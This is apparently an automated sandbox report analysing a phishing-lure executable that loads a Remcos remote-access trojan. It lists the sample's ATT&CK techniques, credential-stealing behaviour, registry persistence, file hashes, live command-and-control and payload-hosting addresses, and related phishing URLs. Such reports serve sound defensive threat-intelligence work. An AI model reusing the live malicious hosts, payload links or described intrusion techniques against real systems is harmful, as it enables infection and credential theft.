            Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 3536, type: MEMORYSTR

            Remote Access Functionality

            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B4UZRV
            Source: Yara match | File source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 Software Packing | 1 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 228 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1563962 | Sample: Purchase-Order27112024.scr.exe | Start date: 27/11/2024 | Architecture: WINDOWS | Score: 100

Start node (2):
• DNS/IP: mynewpro.online; www.healthselflesssupplies.co.za; 2 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Yara detected GuLoader; 9 other signatures
• Started process (8): Purchase-Order27112024.scr.exe (1 created registry value, 27 created files)

Process (8) Purchase-Order27112024.scr.exe:
• Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
• Signatures: Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Drops PE files with a suspicious file extension; 2 other signatures
• Started process (12): Purchase-Order27112024.scr.exe (4 created registry values, 15 created files)

Process (12) Purchase-Order27112024.scr.exe:
• DNS/IP: mynewpro.online 94.156.227.184, ports 2404, 49776, 49781, NETIXBG Bulgaria; healthselflesssupplies.co.za 164.160.91.32, ports 443, 49755, ElitehostZA South Africa; geoplugin.net 178.237.33.50, ports 49782, 80, ATOM86-ASATOM86NL Netherlands
• Dropped file: C:\Users\user\AppData\...\Perissodactylic.scr, PE32
• Signatures: Detected Remcos RAT; Creates autostart registry keys with suspicious values (likely registry only malware); Maps a DLL or memory area into another process
• Started processes (17), (20), (22): Purchase-Order27112024.scr.exe (1), Purchase-Order27112024.scr.exe (1), Purchase-Order27112024.scr.exe (2)

Process (17) Purchase-Order27112024.scr.exe:
• Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)

Process (20) Purchase-Order27112024.scr.exe:
• Signatures: Tries to steal Mail credentials (via file / registry access)

Source | Detection | Scanner | Label
Purchase-Order27112024.scr.exe | 11% | ReversingLabs |
Purchase-Order27112024.scr.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr | 11% | ReversingLabs |

No Antivirus matches

Source | Detection | Scanner | Label
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin | 0% | Avira URL Cloud | safe
https://www.healthselflesssupplies.co.za/ | 0% | Avira URL Cloud | safe
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH | 0% | Avira URL Cloud | safe
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I | 0% | Avira URL Cloud | safe
mynewpro.online | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mynewpro.online | 94.156.227.184 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | high
healthselflesssupplies.co.za | 164.160.91.32 | true | false | | unknown
www.healthselflesssupplies.co.za | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin | false | Avira URL Cloud: safe | unknown
mynewpro.online | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I | Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/ | bhv2E52.tmp.6.dr | false | | high
http://www.imvu.comr | Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpl | Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.compData | Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingth | bhv2E52.tmp.6.dr | false | | high
http://geoplugin.net/json.gphy | Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.com | Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=wsb | bhv2E52.tmp.6.dr | false | | high
http://geoplugin.net/json.gpq | Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net | Purchase-Order27112024.scr.exe, 00000006.00000002.2586522096.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv2E52.tmp.6.dr | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | bhv2E52.tmp.6.dr | false | | high
https://deff.nelreports.net/api/report?cat=msn | bhv2E52.tmp.6.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | Purchase-Order27112024.scr.exe, Perissodactylic.scr.2.dr | false | | high
http://geoplugin.net/json.gpalu | Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://www.google.com | Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp4n | Purchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | bhv2E52.tmp.6.dr | false | | high
https://www.healthselflesssupplies.co.za/ | Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhv2E52.tmp.6.dr | false | | high
https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH | Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv2E52.tmp.6.dr | false | | high
https://aefd.nelreports.net/api/report?cat=bingrms | bhv2E52.tmp.6.dr | false | | high
https://www.google.com/accounts/servicelogin | Purchase-Order27112024.scr.exe | false | | high
https://login.yahoo.com/config/login | Purchase-Order27112024.scr.exe | false | | high
http://geoplugin.net/json.gpX | Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net/ | Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | bhv2E52.tmp.6.dr | false | | high
http://www.ebuddy.com | Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
164.160.91.32 | healthselflesssupplies.co.za | South Africa | 328037 | ElitehostZA | false
94.156.227.184 | mynewpro.online | Bulgaria | 57463 | NETIXBG | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563962
Start date and time: 2024-11-27 16:49:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase-Order27112024.scr.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/14@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 173
• Number of non-executed functions: 321
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Purchase-Order27112024.scr.exe
Time | Type | Description
10:51:12 | API Interceptor | 3307475x Sleep call for process: Purchase-Order27112024.scr.exe modified
16:50:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
16:50:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              164.160.91.32https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                178.237.33.508gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • geoplugin.net/json.gp
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                4MP0E0gWFJ.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • geoplugin.net/json.gp
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                geoplugin.net8gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 178.237.33.50
                                                                                SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                4MP0E0gWFJ.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 178.237.33.50
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                ATOM86-ASATOM86NL8gLdIfw09Wi50H5.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 178.237.33.50
SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbs | malicious | GuLoader, Remcos | 178.237.33.50
awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs | malicious | GuLoader, Remcos | 178.237.33.50
z51awb_shipping.cmd | malicious | GuLoader, Remcos | 178.237.33.50
4MP0E0gWFJ.exe | malicious | Remcos | 178.237.33.50
thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
Payment Advice.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
1732558817bbcbf1fb4c5fb0223fe676ac7a21c34a2edc448b45a4a989f86b416d1dcecdef824.dat-decoded.exe | malicious | Remcos | 178.237.33.50
Rooming list.js | malicious | Remcos | 178.237.33.50
OC25-11-24.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50

Match: ElitehostZA
Associated Sample Name / URL | Detection | Threat Name | Context
https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com | malicious | HTMLPhisher | 164.160.91.32
https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.com | malicious | Unknown | 164.160.91.37
https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6 | malicious | Unknown | 164.160.91.31
https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ== | malicious | Unknown | 164.160.91.31
http://www.fire.co.za | malicious | Unknown | 164.160.91.17
https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20= | malicious | Unknown | 164.160.91.23
https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ== | malicious | HTMLPhisher | 164.160.91.23
Q_u_a_r_a_nt_i_n_e A_l_e_r_t giovanni.busco RD6KUA46 648950657.eml | malicious | HTMLPhisher | 164.160.91.37
http://py.gm7ad.shishabuzz.co.za.#.aHR0cHM6Ly9sb2dpbi1taWNyb3NvZnRteWRvbWFpbnNjb20uZ2FzdG9yYWtlb3BhLmNvbS8/dXNlcm5hbWU9Z3JlZ29yeS53ZXN0QGFsZ29tYS5jb20= | malicious | HTMLPhisher | 164.160.91.42
http://3e.hlite.shishabuzz.co.za./#.aHR0cHM6Ly9iYWZ5YmVpZ2d6Y2N3dHVlZGNycXhqdW03ZWJlNGZ0eDUzdWt1eDZpbHFid2x1aml2a3QzcDJ1ZWR6dS5pcGZzLnczcy5saW5rL3h4eXMuaHRtbCN5dm9ubmVfY29udHJlcmFzQGZkLm9yZw== | malicious | HTMLPhisher | 164.160.91.42

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
Update.js | malicious | NetSupport RAT | 164.160.91.32
z34SOLICITUDDEP.vbs | malicious | Remcos, GuLoader | 164.160.91.32
SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbs | malicious | GuLoader, Remcos | 164.160.91.32
file.exe | malicious | Amadey, Stealc, Vidar | 164.160.91.32
awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs | malicious | GuLoader, Remcos | 164.160.91.32
6X4BIzTTBR.exe | malicious | Stealc | 164.160.91.32
vwkb5DQRAL.exe | malicious | Stealc, Vidar | 164.160.91.32
z51awb_shipping.cmd | malicious | GuLoader, Remcos | 164.160.91.32
file.exe | malicious | Vidar | 164.160.91.32
Viderefrt.exe | malicious | GuLoader, Snake Keylogger | 164.160.91.32

Match: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown
debit-note-19-08-dn-2024.exe | malicious | GuLoader
debit-note-19-08-dn-2024.exe | malicious | GuLoader
HE9306_AWBLaser_Single240812144358.exe | malicious | GuLoader
HE9306_AWBLaser_Single240812144358.exe | malicious | GuLoader
z41_EX24-772_24.exe | malicious | GuLoader
z41_EX24-772_24.exe | malicious | GuLoader
_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | malicious | FormBook, GuLoader
_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | malicious | GuLoader
PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe | malicious | GuLoader

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.015105568788186
Encrypted: false
SSDEEP: 12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 8937B63DC0B37E949F38E7874886D999
SHA1: 62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
SHA-256: AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
SHA-512: 077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
Malicious: false
Reputation: moderate, very likely benign file
Preview: {. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 48
Entropy (8bit): 4.829448698502606
Encrypted: false
SSDEEP: 3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
MD5: E7F60749537446D1C77072173B5415A3
SHA1: B9CFEF43585C8B26A5DAA2FE581859759A183C67
SHA-256: 3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
SHA-512: D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
Malicious: false
Reputation: low
Preview: [ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x61f8d683, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 17301504
Entropy (8bit): 1.0259151041230123
Encrypted: false
SSDEEP: 6144:zvQZn7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkof:lyUt3F0TkT0TAitKxK9JdMa4AgC
MD5: 38B6B4DFDE7989B957443BD490AEB116
SHA1: 5C19E066E9BE645C486977AF7BFB4E10163C7AD1
SHA-256: 1CFFF8589E376B0C28E9E28B90CDD63B95D5D5BB516B02A714018EB61CD21A31
SHA-512: D0281044F12C6B7F35846DBD4DD6F168BD017F128DF75BEE08E19509AF2DFBB0F14CB141564D9E472FEE972B6F9069F9EFFC116FE569B1EBCB70F7DED1CD9692
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: data
Category: dropped
Size (bytes): 1252070
Entropy (8bit): 3.9296044035967466
Encrypted: false
SSDEEP: 12288:XP7hb1+gBbz+rhxKS7LWZSMRkx11lDHli5gDFhthZzDT/2d5+pQLVWzD:/d4qqr24IBAZzDT/lK6D
MD5: F062244C2750C78C3FEB9CBE0C43842C
SHA1: 48403C4205FE5D3C45CFB1993A17E20128F0D458
SHA-256: E67B56234F878BEFDC846063E3FD5D1A143CC28102D60B0CFECCFAB05A8A5323
SHA-512: 1AB3BC2DEBBFB95C46A82C011753A0189F652C4DDE624AE614CF087B123CF034B6E5483941B1C74DEAB9EF6A244369D87B7716BCF8BE5598EBD6DA5E432EBB6D
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.656006343879828
Encrypted: false
SSDEEP: 192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
MD5: 3E6BF00B3AC976122F982AE2AADB1C51
SHA1: CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
SHA-256: 4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
SHA-512: 1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious
• Filename: debit-note-19-08-dn-2024.exe, Detection: malicious
• Filename: debit-note-19-08-dn-2024.exe, Detection: malicious
• Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious
• Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious
• Filename: z41_EX24-772_24.exe, Detection: malicious
• Filename: z41_EX24-772_24.exe, Detection: malicious
• Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious
• Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious
